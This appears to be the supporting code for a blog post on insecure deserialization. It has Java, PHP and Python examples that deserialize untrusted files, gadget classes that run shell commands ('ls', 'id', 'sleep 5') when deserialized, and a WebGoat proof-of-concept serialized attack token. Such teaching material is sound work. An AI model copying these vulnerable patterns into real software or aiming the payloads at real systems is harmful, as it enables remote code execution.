Supporting material for the Insecure Deserialization blog post https://thehackerish.com/insecure-deserialization-explained-with-examples

deserialization-token

The token will not work because the vulnerable class checks if the token is older than 10 minutes. You need to generate one yourself using the instructions on the blog post: https://thehackerish.com/insecure-deserialization-explained-with-examples
rO0ABXNyADFvcmcuZHVtbXkuaW5zZWN1cmUuZnJhbWV3b3JrLlZ1bG5lcmFibGVUYXNrSG9sZGVyAAAAAAAAAAICAANMABZyZXF1ZXN0ZWRFeGVjdXRpb25UaW1ldAAZTGphdmEvdGltZS9Mb2NhbERhdGVUaW1lO0wACnRhc2tBY3Rpb250ABJMamF2YS9sYW5nL1N0cmluZztMAAh0YXNrTmFtZXEAfgACeHBzcgANamF2YS50aW1lLlNlcpVdhLobIkiyDAAAeHB3DgUAAAfkAhoPDgwkiz74eHQAB3NsZWVwIDV0AAVkdW1teQ==

JavaDeserial.java

import java.io.*;
public class JavaDeserial{
 
    public static void main(String args[]) throws Exception{

        FileInputStream fis = new FileInputStream("/tmp/normalObj.serial");
        ObjectInputStream ois = new ObjectInputStream(fis);
 
        NormalObj unserObj = (NormalObj)ois.readObject();
        ois.close();
    }
}

class NormalObj implements Serializable{
    public String name;
    public NormalObj(String name){
    this.name = name;
    }
    private void readObject(java.io.ObjectInputStream in) throws IOException, ClassNotFoundException{
        in.defaultReadObject();
        System.out.println(this.name);
    }
}

class VulnObj implements Serializable{
    public String cmd;
    public VulnObj(String cmd){
    this.cmd = cmd;
    }
    private void readObject(java.io.ObjectInputStream in) throws IOException, ClassNotFoundException{
        in.defaultReadObject();
    String s = null;
        Process p = Runtime.getRuntime().exec(this.cmd);
        BufferedReader stdInput = new BufferedReader(new InputStreamReader(p.getInputStream()));
        while ((s = stdInput.readLine()) != null) {
            System.out.println(s);
        }
    }
}

JavaSerial.java

import java.io.*;

public class JavaSerial{
 
    public static void main(String args[]) throws Exception{

        VulnObj vulnObj = new VulnObj("ls");
 
        FileOutputStream fos = new FileOutputStream("/tmp/normalObj.serial");
        ObjectOutputStream os = new ObjectOutputStream(fos);
        os.writeObject(vulnObj);
        os.close();

    }
}
class VulnObj implements Serializable{
    public String cmd;
    public VulnObj(String cmd){
    this.cmd = cmd;
}
}

php-object-injection-example-deserialize.php

class DangerousClass {

    function __construct() {
        $this->cmd = "id";
    }
    
    function __destruct() {
        echo passthru($this->cmd);
    }

}
class NormalClass {

    function __construct() {
        $this->name = "bob";
    }
    
    function __destruct() {
        echo $this->name;
    }

}
$serial = file_get_contents('/tmp/serial');
unserialize($serial);

php-object-injection-example-serialize.php

class DangerousClass {

    function __construct() {
        $this->cmd = "ls";
    }
    
    function __destruct() {
        echo passthru($this->cmd);
    }

}
$a = new DangerousClass();
$b = serialize($a);
file_put_contents("/tmp/serial", $b);

python-deserialize.py

import pickle

with open('/tmp/serial', 'r') as f:
    pickle.loads(f.read())

python-serialize.py

import pickle

class VulnPickle(object):
    def __reduce__(self):
        import os
        return (os.system,("id",))

a = pickle.dumps(VulnPickle())
with open('/tmp/serial', 'w') as f:
    f.write(a)

WebGoat-deserialization-poc.java

package org.dummy.insecure.framework;

import java.io.FileOutputStream;
import java.io.ObjectOutputStream;

public class Attack {
   public static void main(String args[]) throws Exception{

       VulnerableTaskHolder vulnObj = new VulnerableTaskHolder("dummy", "sleep 5");
       FileOutputStream fos = new FileOutputStream("serial");
       ObjectOutputStream os = new ObjectOutputStream(fos);
       os.writeObject(vulnObj);
       os.close();

   }
}

rO0ABXQAVklmIHlvdSBkZXNlcmlhbGl6ZSBtZSBkb3duLCBJIHNoYWxsIGJlY29tZSBtb3JlIHBvd2VyZnVsIHRoYW4geW91IGNhbiBwb3NzaWJseSBpbWFnaW5l